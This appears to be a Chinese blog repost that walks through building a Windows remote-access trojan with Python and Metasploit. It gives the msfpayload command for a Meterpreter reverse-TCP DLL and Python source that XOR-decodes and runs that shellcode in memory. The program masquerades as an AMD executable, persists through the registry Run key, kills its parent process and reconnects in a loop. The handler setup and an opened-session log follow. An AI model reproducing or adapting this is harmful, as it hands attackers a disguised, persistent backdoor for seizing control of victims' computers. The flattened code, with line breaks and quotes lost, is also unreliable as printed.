首页 > 代码库 > python+msf make windows远控

python+msf make windows远控

分析的一个远控,感谢wstone的指导~

创建dll

./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444  -t dll X > /tmp/sc.dll

python

main.py

import sys, osimport shutilimport timeimport ctypesimport globimport multiprocessingimport multiprocessing.forkingfrom sc import scfrom win32file import GetLongPathNameimport _winregfrom itertools import izip, cyclefrom utils import getppid, kill, get_base_dirRECONNECT_SLEEP = 60STARTUP_SLEEP = 30CHILD_STARTUP_SLEEP = 10METER_NAME = "aticlex.exe"METER_DIR = "AMD"USER_DIR = os.path.expanduser("~")try:    from win32com.shell import shellcon, shell    APPDATA_DIR = shell.SHGetFolderPath(0, shellcon.CSIDL_APPDATA, 0, 0)    DATA_DIR = os.path.join(APPDATA_DIR, METER_DIR)except:    DATA_DIR = os.path.join(USER_DIR, METER_DIR)METER_PATH = os.path.join(DATA_DIR, METER_NAME)class _Popen(multiprocessing.forking.Popen):    def __init__(self, *args, **kw):        if hasattr(sys, frozen):            os.putenv(_MEIPASS2, sys._MEIPASS)        try:            super(_Popen, self).__init__(*args, **kw)        finally:            if hasattr(sys, frozen):                os.unsetenv(_MEIPASS2)class Process(multiprocessing.Process):    _Popen = _Popenclass Worker(Process):    def xor(self, data, key=\x41\x82\x99\x73\x12\xf8\x0e\x38):        return ‘‘.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key)))    def run(self):        time.sleep(CHILD_STARTUP_SLEEP)        code = self.xor(sc)        cbuf = ctypes.create_string_buffer(code)        func = ctypes.cast(cbuf, ctypes.CFUNCTYPE(ctypes.HRESULT))        func()def install():    reg = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)    key = _winreg.OpenKey(reg, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, _winreg.KEY_ALL_ACCESS)    _winreg.SetValueEx(key, METER_NAME.split(".")[0], 0, _winreg.REG_SZ, METER_PATH)    path = GetLongPathName(sys.executable)    if path != METER_PATH:        if not os.path.exists(DATA_DIR):            os.makedirs(DATA_DIR)        try:            shutil.copy(path, METER_PATH)        except Exception as e:            sys.exit(1)        os.execve(METER_PATH, [METER_PATH], os.environ)def clean():    try:        base_dir = get_base_dir()        temp_dir = os.path.abspath(os.path.join(base_dir, os.pardir))        mei = base_dir.split("\\")[-1]        pattern = "%s\\_MEI*" % temp_dir        for path in glob.glob(pattern):            path = GetLongPathName(path)            if path != base_dir and mei.lower() not in path.lower():                try:                    shutil.rmtree(path)                except:                    pass    except:        passdef main():    kill(getppid())    time.sleep(STARTUP_SLEEP)    install()    clean()    while True:        p = Worker()        p.daemon = True        p.start()        p.join()        time.sleep(RECONNECT_SLEEP)if __name__ == "__main__":    multiprocessing.freeze_support()    main()

sc.py

sc=‘\x12\x34‘ .........# sc = sc.dll open with rb mode

然后pythoninstall 生成exe。

  

监听:

msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  payload => windows/meterpreter/reverse_tcp  msf exploit(handler) > set lhost 192.168.1.123lhost => 192.168.1.123msf exploit(handler) > set lport 4444  lport => 4444  msf exploit(handler) > run  [*] Started reverse handler on 192.168.1.123:4444  [*] Starting the payload handler...  [*] Sending stage (770048 bytes) to 192.168.1.80  [*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500  meterpreter >  

  

python+msf make windows远控